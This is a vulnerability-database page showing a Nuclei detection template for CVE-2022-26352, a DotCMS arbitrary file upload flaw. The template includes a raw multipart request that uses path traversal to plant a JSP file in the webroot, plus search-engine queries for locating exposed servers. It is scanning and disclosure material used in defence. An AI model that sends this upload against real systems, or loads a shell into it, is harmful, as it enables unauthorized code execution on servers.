Lucene search
K

DotCMS - Arbitrary File Upload

🗓️ 03 Jun 2026 06:04:49Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 37 Views

DotCMS - Arbitrary File Upload, remote code execution vulnerability, CVE-2022-2635

Related
Refs
Code
ReporterTitlePublishedViews
Family
0day.today
dotCMS Shell Upload Exploit
2 Jun 202200:00
zdt
ATTACKERKB
CVE-2022-26352
17 Jul 202200:00
attackerkb
Circl
CVE-2022-26352
4 May 202214:13
circl
CISA KEV Catalog
dotCMS Unrestricted Upload of File Vulnerability
25 Aug 202200:00
cisa_kev
CNNVD
dotCMS 安全漏洞
2 Jun 202200:00
cnnvd
Check Point Advisories
dotCMS Arbitrary File Upload (CVE-2022-26352; CVE-2018-5445)
16 Aug 202200:00
checkpoint_advisories
CVE
CVE-2022-26352
17 Jul 202221:54
cve
Cvelist
CVE-2022-26352
17 Jul 202221:54
cvelist
Microsoft Malware Protection
North Korean threat actor targets small and midsize businesses with H0lyGh0st ransomware
14 Jul 202216:00
mmpc
Metasploit
DotCMS RCE via Arbitrary File Upload.
2 Jun 202217:42
metasploit
Rows per page
id: CVE-2022-26352

info:
  name: DotCMS - Arbitrary File Upload
  author: h1ei1
  severity: critical
  description: DotCMS management system contains an arbitrary file upload vulnerability via the /api/content/ path which can allow attackers to upload malicious Trojans to obtain server permissions.
  impact: |
    Successful exploitation of this vulnerability can lead to remote code execution, compromising the confidentiality, integrity, and availability of the affected system.
  remediation: |
    Apply the latest security patches or updates provided by the vendor to fix this vulnerability.
  reference:
    - https://blog.assetnote.io/2022/05/03/hacking-a-bank-using-dotcms-rce/
    - https://github.com/h1ei1/POC/tree/main/CVE-2022-26352
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26352
    - http://packetstormsecurity.com/files/167365/dotCMS-Shell-Upload.html
    - https://groups.google.com/g/dotcms
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-26352
    cwe-id: CWE-22
    epss-score: 0.94309
    epss-percentile: 0.9995
    cpe: cpe:2.3:a:dotcms:dotcms:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: dotcms
    product: dotcms
    shodan-query: http.title:"dotcms"
    fofa-query: title="dotcms"
    google-query: intitle:"dotcms"
  tags: cve,cve2022,packetstorm,rce,dotcms,kev,fileupload,intrusive,vkev,vuln

http:
  - raw:
      - |
        POST /api/content/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=------------------------aadc326f7ae3eac3

        --------------------------aadc326f7ae3eac3
        Content-Disposition: form-data; name="name"; filename="../../../../../../../../../srv/dotserver/tomcat-9.0.41/webapps/ROOT/{{randstr}}.jsp"
        Content-Type: text/plain

        <%
        out.println("CVE-2022-26352");
        %>
        --------------------------aadc326f7ae3eac3--
      - |
        GET /{{randstr}}.jsp HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body_2, "CVE-2022-26352")'
          - 'status_code_2 == 200'
        condition: and
# digest: 4b0a00483046022100b6dfb883623a5bab687c2cab37212ee9298be4c4a39586754a68ed46c9b4e301022100b6b8e07dae2b46f0e6898f581ea1dab23c407958484710c67b0220b7a07ea068:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.5High risk
Vulners AI Score7.5
CVSS 26.8
CVSS 3.19.8
EPSS0.94309
SSVC
37